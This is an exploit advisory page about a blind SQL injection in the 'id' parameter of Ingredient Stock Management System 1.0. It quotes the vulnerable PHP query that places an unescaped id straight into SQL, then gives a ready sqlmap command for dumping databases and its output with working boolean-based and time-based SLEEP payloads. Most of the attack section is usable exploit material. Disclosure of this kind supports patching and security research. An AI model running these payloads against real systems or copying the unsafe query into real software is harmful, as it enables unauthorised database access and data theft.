Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection

2022.05.31
sa Saud Alenazi (SA) sa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection # Date: 28/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux Description : ---------------------- Ingredient Stock Management System 1.0 allows SQL Injection via parameter 'id' in /isms/admin/stocks/view_stock.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database # Vulnerable Code : line 74 in file "/isms/admin/stocks/view_stock.php" $stockins = $conn->query("SELECT * FROM `stockin_list` where item_id = '{$id}' order by date(`date`) asc"); # Sqlmap command: sqlmap -u 'http://localhost/isms/admin/?page=stocks/view_stock&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta # Output: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=stocks/view_stock&id=1' AND 1902=1902 AND 'yluX'='yluX Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=stocks/view_stock&id=1' AND (SELECT 6709 FROM (SELECT(SLEEP(5)))gZCj) AND 'vMqP'='vMqP


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top